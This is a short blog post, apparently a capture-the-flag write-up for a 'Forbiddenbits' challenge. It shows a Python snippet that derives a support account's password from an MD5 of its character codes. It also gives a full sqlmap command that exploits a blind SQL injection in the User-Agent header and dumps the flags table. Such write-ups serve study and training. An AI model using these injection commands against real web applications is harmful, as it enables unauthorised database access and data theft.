→ Forbiddenbits - Task 2

| No TrackBacks
Task 2 Solution First hint was on Support contact page, we can see here a message with login "support01". But where was password? Well, we check all pages of site and finally there was vulnerability in: Spaceships page showed a list of files, the interesting one was win-executable: Some reverse engineering of this file gave us hash generation algorithm:
import hashlib
name = 'support01'
s = ''
for x in name:
  s += '%d' % ord(x)
print hashlib.md5(s).hexdigest()
First flag we can see in userspace of our registered users. Second vulnerability (blind SQLi) was in User-agent header in support userspace. So, we used sqlmap tool with such commandline options: ./sqlmap.py -u "" -p user-agent --cookie="PHPSESSID=li8hk6f8g29e4lickdhh2jhjs5" --technique=T --risk=5 --level=5 --dbms=mysql --tables --time-sec=2 -D chall --dump Database: chall Table: flag0x55558879 <-- second flag here +--------------------------------------------------------+----+ | elkfjhOIEIUEIIUIUIIUOOIIU77 <--third flag here | 14 | +--------------------------------------------------------+----+

No TrackBacks

TrackBack URL: http://smokedchicken.org/m/mt-tb.cgi/65

About this Entry

This page contains a single entry by Юрий Леонычев published on February 13, 2012 2:55 PM.

SnD Reverser Tool was the previous entry in this blog.

Forbiddenbits - Task 3 is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.